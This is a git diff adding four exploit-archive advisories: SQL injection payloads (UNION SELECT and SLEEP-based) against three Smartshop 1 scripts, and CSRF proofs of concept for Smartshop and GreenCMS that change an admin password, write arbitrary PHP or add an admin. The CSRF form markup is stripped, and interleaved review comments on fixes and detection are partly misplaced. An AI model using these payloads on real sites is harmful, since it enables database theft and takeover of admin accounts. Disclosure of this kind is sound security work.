diff --git a/exploits/php/webapps/44823.txt b/exploits/php/webapps/44823.txt
new file mode 100644
index 000000000..51085cb63
--- /dev/null
+++ b/exploits/php/webapps/44823.txt
@@ -0,0 +1,60 @@
+# Exploit Title: Smartshop 1 - SQL Injection
+# Date: 2018-06-02
+# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
+# Software Link: https://github.com/smakosh/Smartshop/archive/master.zip
+# Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website
+# Version: 1
+# Tested on: Kali linux
+=================================================
+# Description :
+Smartshop 1 suffers from sql injection which attacker can inject sql
+commands .
+=================================================
+# POC : SQLi
+
+# vulnerable files : [ category.php , product.php , search.php ]
+
+1) category.php :
+# Parameter : id
+# Type : Union based
+# Payload : ' UNION SELECT 1,user(),3,4,5%23
+
+# Vulnerable code :
+
+$id_category =$_GET['id'];
+$start = ($page > 1) ? ($page * $perpage) - $perpage : 0;
+$queryproduct = "SELECT SQL_CALC_FOUND_ROWS id, name, price, id_picture,
+thumbnail FROM product WHERE id_category = '{$id_category}' ORDER BY id
+DESC LIMIT {$start}, 16";
+$result = $connection->query($queryproduct);
+
+=================================================
+
+2) product.php :
+# Parameter : id
+# Type : Union based
+# Payload : ' UNION SELECT 1,user(),database(),4,5,6%23
+
+# Vulnerable code :
+
+$id_product =$_GET['id'];
+$queryproduct = "SELECT id, name, price, description, id_picture, thumbnail
+ FROM product WHERE id = '{$id_product}'";
+$result1 = $connection->query($queryproduct);
+
+=================================================
+
+3) search.php :
+# Parameter : searched
+# Type : Time-based blind
+# Payload : ' AND SLEEP(10)%23
+
+# Vulnerable code :
+
+$word = $_GET['searched'];
+$queryproduct = "SELECT SQL_CALC_FOUND_ROWS id, name, price, id_picture,
+thumbnail FROM product WHERE name LIKE '%{$word}%' ORDER BY id DESC LIMIT
+{$start}, 16";
+$result = $connection->query($queryproduct);
+
+=================================================
\ No newline at end of file
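Review bot: The three snippets quoted under "Vulnerable code" interpolate `$_GET['id']` and `$_GET['searched']` straight into the SQL string handed to `$connection->query()`, and the advisory stops there without naming the fix; the remediation is a prepared statement with a `?` placeholder per value, binding `$id_category`, `$id_product` and `$word` as parameters and casting the id values to `int` before use. `$start` is also interpolated unquoted into `LIMIT {$start}, 16` in category.php and search.php; `$page` and `$perpage` are not shown in the hunk, so if `$page` is read from the request without an integer cast that is a further injection point the advisory should mention. In search.php, `%` and `_` inside `$word` remain LIKE wildcards even after binding, so they need escaping if a literal match is intended. On the detection side, quoted `UNION`/`SLEEP(` fragments in the `id` and `searched` query parameters of these three scripts are the pattern to alert on in access logs.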
diff --git a/exploits/php/webapps/44824.html b/exploits/php/webapps/44824.html
new file mode 100644
index 000000000..f12efb143
--- /dev/null
+++ b/exploits/php/webapps/44824.html
@@ -0,0 +1,31 @@
+# Exploit Title: Smartshop 1 - Cross site request forgery
+# Date: 2018-06-02
+# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
+# Software Link: https://github.com/smakosh/Smartshop/archive/master.zip
+# Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website
+# Version: 1
+# Tested on: Kali linux
+=================================================
+
+# POC : CSRF
+
+# Exploit :
+# vulnerable file : editprofile.php
+ + + + Change admin password + + +
+ + + +
+ + + + +==================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/44825.html b/exploits/php/webapps/44825.html
new file mode 100644
index 000000000..746bb74de
--- /dev/null
+++ b/exploits/php/webapps/44825.html
@@ -0,0 +1,33 @@
+# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell
+# Date: 2018-06-02
+# Exploit Author: xichao
+# Vendor Homepage: https://github.com/GreenCMS/GreenCMS
+# Software Link: https://github.com/GreenCMS/GreenCMS
+# Version: v2.3.0603
+# CVE : CVE-2018-11670
+
+An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that
+allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect.
+
+poc:
+ + + + + + csrftest + +
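Review bot: The hunk names editprofile.php as the endpoint whose admin password change can be forged but records no remediation, which the entry should carry: a per-session anti-CSRF token verified on the POST, requiring the current password before a new one is accepted, and `SameSite=Lax` (or `Strict`) on the session cookie as defence in depth. The add-admin form in 44826.html (`index.php?m=admin&c=access&a=adduserhandle`) has the same gap and the same fix. The form markup of this hunk is not visible in this rendering (the HTML tags appear to have been stripped, leaving only "Change admin password"), so the request fields cannot be checked here.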
+ + + +  + +
+ +
+ +References: +http://www.iwantacve.cn/index.php/archives/38/ +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670 +https://github.com/GreenCMS/GreenCMS/issues/108 \ No newline at end of file diff --git a/exploits/php/webapps/44826.html b/exploits/php/webapps/44826.html new file mode 100644 index 000000000..7946a847e --- /dev/null +++ b/exploits/php/webapps/44826.html @@ -0,0 +1,39 @@ +# Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability add admin +# Date: 2018-06-02 +# Exploit Author: xichao +# Vendor Homepage: https://github.com/GreenCMS/GreenCMS +# Software Link: https://github.com/GreenCMS/GreenCMS +# Version: v2.3.0603 +# CVE : CVE-2018-11671 + +An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that can add an admin account via index.php?m=admin&c=access&a=adduserhandle. + +poc: + + + + + + csrftest + +   +     
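Review bot: The hunk states that a forged POST to `index.php?m=admin&c=media&a=fileconnect` with a `content` parameter yields arbitrary PHP execution, which means the CSRF gap is compounded by a media-manager write that accepts server-executable content, and the entry should name both fixes rather than only the forgery. A CSRF token on the action closes the forgery; the write path should additionally reject server-executable extensions and the media directory should be served with script execution disabled, so that neither a forged nor an authenticated write can become code execution. For detection, authenticated POSTs to that action whose `Origin`/`Referer` is missing or off-site are the signal to alert on, and new `.php` files appearing under the media path should be flagged by file-integrity monitoring. The form body is not visible in this rendering (tags stripped), so the exact fields cannot be confirmed here.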
+         +         +         +         +         +         +         +         +         +         + +      
+ +
+ +
+References:
+http://www.iwantacve.cn/index.php/archives/39/
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671
+https://github.com/GreenCMS/GreenCMS/issues/109
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 202c4d198..b63bf164b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -39487,3 +39487,7 @@ id,file,description,date,author,type,platform,port 44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php, 44815,exploits/php/webapps/44815.txt,"CSV Import & Export 1.1.0 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php, 44816,exploits/php/webapps/44816.txt,"Grid Pro Big Data 1.0 - SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
+44823,exploits/php/webapps/44823.txt,"Smartshop 1 - 'id' SQL Injection",2018-06-03,L0RD,webapps,php,
+44824,exploits/php/webapps/44824.html,"Smartshop 1 - Cross-Site Request Forgery",2018-06-03,L0RD,webapps,php,
+44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,longer,webapps,php,
+44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,longer,webapps,php,
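Review bot: The new index rows disagree with the advisories they point to: 44825 and 44826 are attributed to `longer` here while both files carry `# Exploit Author: xichao`, so one of the two should be corrected. All four rows are dated 2018-06-03 while the files say 2018-06-02; if the CSV column is the publication date rather than the authoring date that is fine, but it is worth confirming. The 44823 description `"Smartshop 1 - 'id' SQL Injection"` also understates the advisory, which additionally lists the `searched` parameter of search.php as injectable.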